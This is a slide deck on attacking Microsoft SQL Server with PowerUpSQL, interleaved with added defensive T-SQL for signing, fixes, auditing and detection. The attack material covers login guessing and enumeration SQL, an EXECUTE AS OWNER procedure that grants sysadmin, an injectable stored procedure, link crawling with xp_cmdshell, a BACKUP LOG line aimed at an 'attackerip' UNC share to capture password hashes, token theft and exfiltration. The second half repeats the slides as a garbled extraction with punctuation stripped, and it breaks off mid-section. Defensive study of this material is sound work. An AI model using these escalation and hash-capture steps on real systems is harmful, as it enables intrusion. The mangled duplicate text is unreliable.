Presentation Overview
• Why SQL Server and PowerShell
• PowerUpSQL Overview
• Finding & Accessing SQL Servers
• Privilege Escalation Scenarios
  o Domain user to SQL Server login
  o SQL Server Login to Sysadmin
  o Sysadmin to Windows Admin
  o Windows Admin to Sysadmin
  o Domain Escalation
• Post Exploitation Activities
• General Recommendations
Why SQL Server?
• Used in most enterprise environments
• Supports local Windows and Domain authentication
• Integrates with lots of Windows applications
• Generally has trust relationships that other services don't
Why PowerShell?
• Native to Windows
• Run commands in memory
• Run managed .NET code
• Run unmanaged code
• Avoid detection by legacy anti-virus
• Already flagged as trusted by most application whitelist solutions
• A medium used to write many open source pentest toolkits

• Scalability via runspace threading
• Flexibility via pipeline support, PS objects and data tables
• Portability
  o No SMO dependencies
  o .NET Framework libraries
  o PowerShell v2 compliant (in theory)
  o Single file
Functional Goals
• Discover SQL Servers from different attacker perspectives
• Inventory SQL Servers quickly
• Audit SQL Servers for common insecure configurations
• Escalate privileges quickly on SQL Servers
• Support authentication using SQL Login or Windows Credential
Attacker Perspective | Discovery Techniques
Unauthenticated      | List from file; TCP port scan; UDP port scan; UDP broadcast; Azure DNS dictionary attack (x.database.windows.net); Azure DNS lookup via public resources
Local User           | Services; Registry entries
Domain User          | Service Principal Names; Azure Portal; PowerShell Modules
Find SQL Servers: PowerUpSQL
Attacker Perspective | PowerUpSQL Function
Unauthenticated      | Get-SQLInstanceFile
Unauthenticated      | Get-SQLInstanceUDPScan
Local User           | Get-SQLInstanceLocal
Domain User          | Get-SQLInstanceDomain
Blog: https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql
Escalating Privileges: Unauthenticated / Domain User to SQL Login

Testing Login Access: Techniques
What credentials can I use to log into discovered SQL Servers?
Attacker Perspective                | Attack Technique
Unauthenticated                     | Dictionary attacks using common user names and passwords
Unauthenticated                     | Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account | Attempt to login using the current account

Testing Login Access: PowerUpSQL CMDs
What PowerUpSQL functions can I use to test for successful logins?
Attack Technique      | PowerUpSQL Function
Dictionary Attack     | Invoke-SQLAuditWeakLoginPw
Default Password Test | Invoke-SQLAuditDefaultLoginPw
2. Get the principal ID for the sa account with "suser_id"
3. Use "suser_name" to get SQL logins using just the principal ID
4. Increment the number and repeat

select n [id], SUSER_NAME(n) [user_name]
from (
    select top 10000 row_number() over(order by t1.number) as N
    from master..spt_values t1 cross join master..spt_values t2
) a
where SUSER_NAME(n) is not null

Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7

3. Grab the first 48 bytes of the full RID:
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner (SYSADMIN is often the OWNER)

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
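The seven steps above carried through end to end, as an added T-SQL example that is not code from the slides or from PowerUpSQL. The database (MyAppDb), application user (MyAppUser), procedure, certificate and login names, the master-key password and the certificate export path are placeholders chosen for illustration; the procedure body reads sys.dm_exec_sessions so that VIEW SERVER STATE is the single server permission the signature has to carry.

```sql
-- Added example: certificate-signed procedure (module signing) instead of
-- EXECUTE AS OWNER on a TRUSTWORTHY database. MyAppDb, MyAppUser,
-- dbo.sp_signed_task, SignedTaskCert, SignedTaskLogin, the master-key
-- password and the export path are placeholders chosen for illustration.
USE MyAppDb;
GO
-- Step 1: create the stored procedure. No WITH EXECUTE AS OWNER: the caller
-- keeps their own identity and gains only what the signature carries.
CREATE PROCEDURE dbo.sp_signed_task
AS
BEGIN
    SET NOCOUNT ON;
    -- Seeing sessions other than the caller's own requires VIEW SERVER STATE,
    -- which the application user does not hold.
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END
GO
-- Step 2: database master key (protects the certificate's private key).
IF NOT EXISTS (SELECT 1 FROM sys.symmetric_keys WHERE name = '##MS_DatabaseMasterKey##')
    CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<master-key-password-placeholder>';
GO
-- Step 3: certificate in the application database; the private key stays here.
CREATE CERTIFICATE SignedTaskCert
    WITH SUBJECT = 'Signs dbo.sp_signed_task', EXPIRY_DATE = '20301231';
GO
-- Step 4: create a login from the certificate. The login lives in master, so
-- export the certificate WITHOUT its private key and import the public part.
BACKUP CERTIFICATE SignedTaskCert TO FILE = 'C:\export-path-placeholder\SignedTaskCert.cer';
GO
USE master;
GO
CREATE CERTIFICATE SignedTaskCert FROM FILE = 'C:\export-path-placeholder\SignedTaskCert.cer';
GO
CREATE LOGIN SignedTaskLogin FROM CERTIFICATE SignedTaskCert;  -- cannot connect; holds permissions only
GO
-- Step 5: configure login privileges: exactly the one permission the body needs.
GRANT VIEW SERVER STATE TO SignedTaskLogin;
GO
-- Step 6: sign the procedure. SQL Server drops the signature on any later
-- ALTER PROCEDURE, so a modified body cannot silently keep the privilege.
USE MyAppDb;
GO
ADD SIGNATURE TO dbo.sp_signed_task BY CERTIFICATE SignedTaskCert;
GO
-- Step 7: GRANT EXECUTE to the application user only.
GRANT EXECUTE ON dbo.sp_signed_task TO MyAppUser;
GO
-- Verification: the signature is recorded in the catalog, and the database
-- stays with TRUSTWORTHY OFF.
SELECT OBJECT_NAME(cp.major_id) AS signed_object, c.name AS certificate_name
FROM sys.crypt_properties cp
JOIN sys.certificates c ON c.thumbprint = cp.thumbprint;
SELECT name, is_trustworthy_on FROM sys.databases WHERE name = DB_NAME();
```

The design point is the last two statements: the privilege is bound to the exact procedure text by the signature, not to a database-wide TRUSTWORTHY flag, so neither a db_owner nor an injected ALTER can widen it without the certificate's private key.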
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb''';
EXECUTE(@query)
END
GO
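The vulnerable procedure above placed beside two hardened forms, as an added example that is not from the slides. The procedure names sp_sqli2_fixed and sp_sqli2_dynamic_fixed and the regression call at the end are assumptions for illustration.

```sql
-- Vulnerable pattern (as on the slide): the caller's string is spliced into
-- the statement text, so a quote in @DbName ends the literal and the rest of
-- the input is parsed as SQL. If the procedure also carries WITH EXECUTE AS
-- OWNER, the injected statement runs with the owner's privileges.
CREATE PROCEDURE dbo.sp_sqli2
    @DbName varchar(max)
AS
BEGIN
    DECLARE @query varchar(max);
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb''';
    EXECUTE(@query);
END
GO

-- Fix 1: the query never needed to be dynamic. A static statement treats
-- @DbName purely as a LIKE pattern value; no input can change its shape.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    SELECT name
    FROM master..sysdatabases
    WHERE name LIKE '%' + @DbName + '%' OR name = 'tempdb';
END
GO

-- Fix 2: when the SQL text really must be built at run time, keep the value
-- out of the text and hand it to sp_executesql as a typed parameter.
CREATE PROCEDURE dbo.sp_sqli2_dynamic_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master..sysdatabases WHERE name LIKE ''%'' + @p + ''%'' OR name = ''tempdb''';
    EXEC sys.sp_executesql @query, N'@p sysname', @p = @DbName;
END
GO

-- Regression check: an input carrying a quote and a comment marker. Against
-- sp_sqli2 it rewrites the WHERE clause; against the fixed versions it is just
-- a pattern that matches no database name, so only tempdb comes back.
EXEC dbo.sp_sqli2_fixed         @DbName = 'x'' OR 1=1 --';
EXEC dbo.sp_sqli2_dynamic_fixed @DbName = 'x'' OR 1=1 --';
```

Both fixes also narrow the parameter from varchar(max) to sysname, which is the type of the column being matched; a database name can never legitimately be longer than that.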
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Zones: Internet, DMZ (LRA, HVA, LVA), Intranet (ADS, LVA, HVA); ports 80 and 443; ports 1433 and 1434. Key: HVA = High Value Application, LVA = Low Value Application.
Steps taken by the attacker ("Captain Evil"):
1. SQL Injection
2. Execute local command via xp_cmdshell
3. Execute commands and gather data from other database servers via osql
Result: access to the HVA with the shared domain service account.]
Escalating Privileges: Crawling SQL Server Links

Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Diagram: Leveraging MS SQL Database links. Zones: Internet, DMZ (LRA, HVA, LVA), Intranet (ADS, HVA); ports 80 and 443; ports 1433 and 1434. Key: HVA = High Value Application, LVA = Low Value Application.
1. SQL Injection by "Captain Evil" against the LVA's database server (DB1); DB1 holds a DB link configured with least privileges, and the next server holds a DB link configured with the SA account
2. Execute SQL queries and local commands on database servers via nested linked services]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql

Escalating Privileges: Crawling Server Links
Function               | Description
Get-SQLServerLink      | Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl | Crawls linked servers and supports SQL query and OS command execution
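A configuration audit that covers the three escalation paths described so far (the TRUSTWORTHY plus EXECUTE AS OWNER pattern from the impersonation section, the shared service account, and the linked-server login mappings behind link crawling), as an added T-SQL example that is not part of the slides or of PowerUpSQL. It reads only documented catalog views and DMVs; sys.dm_server_services exists from SQL Server 2008 R2 SP1 onward, and the second query is database-scoped and has to be run in each user database.

```sql
-- Added audit script; every view used here is part of the server catalog.
-- 1. Databases marked TRUSTWORTHY whose owner is a sysadmin: a db_owner there
--    can reach sysadmin through EXECUTE AS OWNER (the sp_escalate_me pattern).
SELECT d.name AS database_name,
       SUSER_SNAME(d.owner_sid) AS owner_login,
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb';           -- msdb is TRUSTWORTHY by design

-- 2. Modules in the current database that run as someone other than the caller.
--    execute_as_principal_id is NULL for CALLER and -2 for OWNER.
SELECT DB_NAME() AS database_name,
       OBJECT_SCHEMA_NAME(m.object_id) AS schema_name,
       OBJECT_NAME(m.object_id) AS object_name,
       CASE m.execute_as_principal_id
            WHEN -2 THEN 'OWNER'
            ELSE USER_NAME(m.execute_as_principal_id) END AS executes_as
FROM sys.sql_modules m
WHERE m.execute_as_principal_id IS NOT NULL;

-- 3. Service accounts: compare service_account across the fleet; the same
--    domain account on many instances is the "one account to rule them all".
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;

-- 4. Linked servers and how logins map across them. local_principal_id = 0 is
--    the default mapping that applies to every local login (the Public role
--    included); a fixed remote_name such as sa on that row hands every caller
--    that identity on the remote side.
SELECT s.name AS link_name, s.data_source, s.provider,
       s.is_data_access_enabled, s.is_rpc_out_enabled,
       CASE WHEN ll.local_principal_id = 0 THEN '<all local logins>'
            ELSE SUSER_NAME(ll.local_principal_id) END AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- 5. Server options that turn a link, a procedure or a query into OS command
--    execution or arbitrary code; all should read 0 unless a documented need exists.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled', 'Ad Hoc Distributed Queries');
```

Query 4 is the one to read first when Get-SQLServerLinkCrawl would be pointed at the estate: a row whose local_login is `<all local logins>` and whose remote_name is a sysadmin on the far server is exactly the hop the crawler exploits, and the fix is a per-login mapping (or `uses_self_credential`) plus a remote login with the narrowest role that the application needs.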
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
  BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
  RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
  https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
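Detection for the two Public-role attacks covered so far, login guessing (the Invoke-SQLAuditWeakLoginPw / Invoke-SQLAuditDefaultLoginPw techniques) and UNC path injection through BACKUP and RESTORE, using SQL Server Audit; this is an added example and not from the slides. The audit and specification names, the file path and the ten-failure threshold are assumptions, and the client_ip column of sys.fn_get_audit_file needs SQL Server 2012 or later, so on unpatched 2008 instances the triage queries have to drop that column.

```sql
USE master;
GO
-- Added example: rolling audit files on local disk (placeholder path; the
-- service account needs write access there).
CREATE SERVER AUDIT PublicRoleAbuse_Audit
    TO FILE (FILEPATH = 'C:\audit-path-placeholder\',
             MAXSIZE = 256 MB,
             MAX_ROLLOVER_FILES = 16)
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);
GO
-- Server-level event groups to record.
CREATE SERVER AUDIT SPECIFICATION PublicRoleAbuse_Spec
    FOR SERVER AUDIT PublicRoleAbuse_Audit
    ADD (FAILED_LOGIN_GROUP),              -- dictionary / default-password guessing
    ADD (BACKUP_RESTORE_GROUP),            -- every BACKUP and RESTORE, UNC targets included
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP), -- sp_addsrvrolemember ... 'sysadmin'
    ADD (SERVER_OBJECT_CHANGE_GROUP)       -- new or altered server objects such as linked servers
    WITH (STATE = ON);
GO
ALTER SERVER AUDIT PublicRoleAbuse_Audit WITH (STATE = ON);
GO

-- Triage 1: login failures bucketed by source and login over the last hour.
-- One client_ip cycling through many logins is the dictionary-attack shape.
-- event_time in audit files is UTC.
SELECT client_ip,
       server_principal_name,
       COUNT(*)        AS failures,
       MIN(event_time) AS first_seen,
       MAX(event_time) AS last_seen
FROM sys.fn_get_audit_file('C:\audit-path-placeholder\*.sqlaudit', DEFAULT, DEFAULT)
WHERE action_id = 'LGIF'                        -- LOGIN FAILED
  AND event_time >= DATEADD(hour, -1, GETUTCDATE())
GROUP BY client_ip, server_principal_name
HAVING COUNT(*) >= 10
ORDER BY failures DESC;

-- Triage 2: backup or restore statements whose DISK target is a UNC path.
-- Each one makes the service account authenticate to that host, so a
-- non-sysadmin principal pointing one at an unknown host is the injection
-- pattern from the slide.
SELECT event_time, server_principal_name, client_ip, statement
FROM sys.fn_get_audit_file('C:\audit-path-placeholder\*.sqlaudit', DEFAULT, DEFAULT)
WHERE statement LIKE '%DISK%=%''\\%'
  AND action_id IN (SELECT action_id FROM sys.dm_audit_actions
                    WHERE name LIKE 'BACKUP%' OR name LIKE 'RESTORE%')
ORDER BY event_time DESC;
```

The second triage query is the compensating control the slide's "no fix for 2000 to 2008" leaves you with: the statement cannot be blocked there, but every occurrence is logged with the issuing login and source address, and the hostname inside the UNC path can be matched against the list of legitimate backup shares.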
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.

Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin

Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges

Escalating Privileges: OS Admin to SysAdmin
Approach            | 2000 | 2005 | 2008 | 2012 | 2014 | 2016
LSA Secrets         |  x   |  x   |  x   |  x   |  x   |  x
Local Administrator |  x   |  x   |      |      |      |
LocalSystem         |  x   |  x   |  x   |      |      |
Process Migration   |  x   |  x   |  x   |  x   |  x   |  x
Token Stealing      |  x   |  x   |  x   |  x   |  x   |  x
Single User Mode    |      |  x   |  x   |  x   |  x   |  x
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options
Approach                                                     | Common Tools
Access as Local Administrator                                | Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                        | Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process  | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process   | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                             | DBATools
Common Post Exploitation Activities

Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server Layer: startup procedures, agent jobs, triggers, modified code
   • OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
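Hunting for the SQL Server layer footholds named under item 1 (startup procedures, agent jobs, triggers, modified code), as an added T-SQL example that is not taken from the slides or from PowerUpSQL. Each query lists one kind of foothold from the documented catalog so a reviewer can diff the output against a known baseline; the 30-day window and the xp_cmdshell keyword match are assumptions.

```sql
USE master;
GO
-- 1. Startup procedures: run under the service account at every service start,
--    but only while 'scan for startup procs' is 1, so list both together.
SELECT name AS startup_procedure, create_date, modify_date
FROM sys.procedures
WHERE OBJECTPROPERTY(object_id, 'ExecIsStartup') = 1;

SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name = 'scan for startup procs';

-- 2. Server-scoped triggers, including logon triggers (event type LOGON),
--    which fire for every connection in the context of the connecting login.
SELECT t.name, te.type_desc AS fires_on, t.is_disabled, t.create_date, t.modify_date
FROM sys.server_triggers t
JOIN sys.server_trigger_events te ON te.object_id = t.object_id
WHERE t.is_ms_shipped = 0;

-- 3. Agent jobs with operating-system or PowerShell steps, or T-SQL steps that
--    call xp_cmdshell; owner, enabled flag and the step command are what to review.
SELECT j.name AS job_name, SUSER_SNAME(j.owner_sid) AS job_owner, j.enabled,
       s.step_id, s.subsystem, s.command, j.date_modified
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
   OR s.command LIKE '%xp_cmdshell%'
ORDER BY j.date_modified DESC;

-- 4. Modified code: procedures, functions and triggers changed in the last
--    30 days in the current database, with their EXECUTE AS setting
--    (NULL = caller, -2 = owner). Run per user database.
SELECT OBJECT_SCHEMA_NAME(o.object_id) AS schema_name, o.name, o.type_desc, o.modify_date,
       m.execute_as_principal_id
FROM sys.objects o
JOIN sys.sql_modules m ON m.object_id = o.object_id
WHERE o.modify_date >= DATEADD(day, -30, GETDATE())
ORDER BY o.modify_date DESC;
```

Scheduled from a job on a separate monitoring instance and stored with a timestamp, the four result sets become a change log; a new row in any of them that no change ticket explains is the persistence finding.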
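The Luhn check from item 2, written as a T-SQL scalar function so that a column sample can be filtered down to values that are structurally valid card numbers before anyone reads the data; an added example that is not code from the slides or from PowerUpSQL. The function name, the constructed sample rows and the 13 to 19 digit range are assumptions.

```sql
IF OBJECT_ID('dbo.fn_LuhnValid', 'FN') IS NOT NULL DROP FUNCTION dbo.fn_LuhnValid;
GO
-- Added example: returns 1 when the digits in @candidate pass the Luhn check.
CREATE FUNCTION dbo.fn_LuhnValid (@candidate varchar(64))
RETURNS bit
AS
BEGIN
    -- Keep digits only, so '4111-1111-1111-1111' and '4111 1111 ...' both qualify.
    DECLARE @digits varchar(64) = '', @i int = 1, @ch char(1);
    WHILE @i <= LEN(@candidate)
    BEGIN
        SET @ch = SUBSTRING(@candidate, @i, 1);
        IF @ch LIKE '[0-9]' SET @digits = @digits + @ch;
        SET @i = @i + 1;
    END
    -- Card numbers are 13 to 19 digits; anything else is not a candidate.
    IF LEN(@digits) < 13 OR LEN(@digits) > 19 RETURN 0;

    -- Luhn: from the right, double every second digit, subtract 9 when the
    -- result exceeds 9, and the total must be divisible by 10.
    DECLARE @sum int = 0, @double bit = 0, @d int;
    SET @i = LEN(@digits);
    WHILE @i >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @i, 1) AS int);
        IF @double = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END
        SET @sum = @sum + @d;
        SET @double = 1 - @double;
        SET @i = @i - 1;
    END
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END
GO

-- Constructed sample: one value that passes Luhn, one that only looks like a
-- card number, one that is not a candidate at all.
DECLARE @sample TABLE (id int, note varchar(100));
INSERT INTO @sample VALUES
    (1, 'Order paid with card 4111 1111 1111 1111'),  -- well-known Luhn-valid test number
    (2, 'Reference 1234 5678 9012 3456'),             -- 16 digits, fails Luhn (sum 64)
    (3, 'Invoice 2024-0042');                         -- too short to be a card number

-- Coarse pattern prefilter (T-SQL LIKE is not a regex engine), then the Luhn
-- filter on what the pattern found. Expected: rows 1 and 2, luhn_valid 1 and 0.
SELECT id, note, dbo.fn_LuhnValid(note) AS luhn_valid
FROM @sample
WHERE note LIKE '%[0-9][0-9][0-9][0-9]%[0-9][0-9][0-9][0-9]%[0-9][0-9][0-9][0-9]%[0-9][0-9][0-9][0-9]%';
```

The function scores every digit in the value it is given, so in a real scan it is applied to the sampled column value, not to free text containing other numbers; pairing a pattern prefilter with the checksum is what keeps a column of order references or phone numbers from being reported as card data.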
Presentation Overview Why SQL Server and PowerShell
PowerUpSQL Overview
Finding amp Accessing SQL Servers
Privilege Escalation Scenarioso Domain user to SQL Server logino SQL Server Login to Sysadmino Sysadmin to Windows Admino Windows Admin to Sysadmino Domain Escalation
Post Exploitation Activities
General Recommendations
Why SQL Server Used in most enterprise environments
Supports local Windows and Domain authentication
Integrates with lots of Windows applications
Generally has trust relationships that other donrsquot
Why PowerShell Native to Windows
Run commands in memory
Run managed net code
Run unmanaged code
Avoid detection by legacy Anti-virus
Already flagged as trusted by most application whitelist solutions
A medium used to write many open source Pentest toolkits
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Network zones: Internet, DMZ, Intranet. Systems: LRA, HVA, LVA, ADS; labelled ports 80 and 443, and ports 1433 and 1434. Steps shown: 1. SQL Injection against the LVA; 2. Execute local command via xp_cmdshell; 3. Execute commands and gather data from other database servers via osql, giving access to the HVA with the shared domain service account. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges
Crawling SQL Server Links
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Diagram: Leveraging MS SQL Database links. Same zones and systems as the previous diagram plus DB1. Steps shown: 1. SQL Injection against the LVA; the path onward uses a DB link with least privileges and a DB link with the SA account; 2. Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
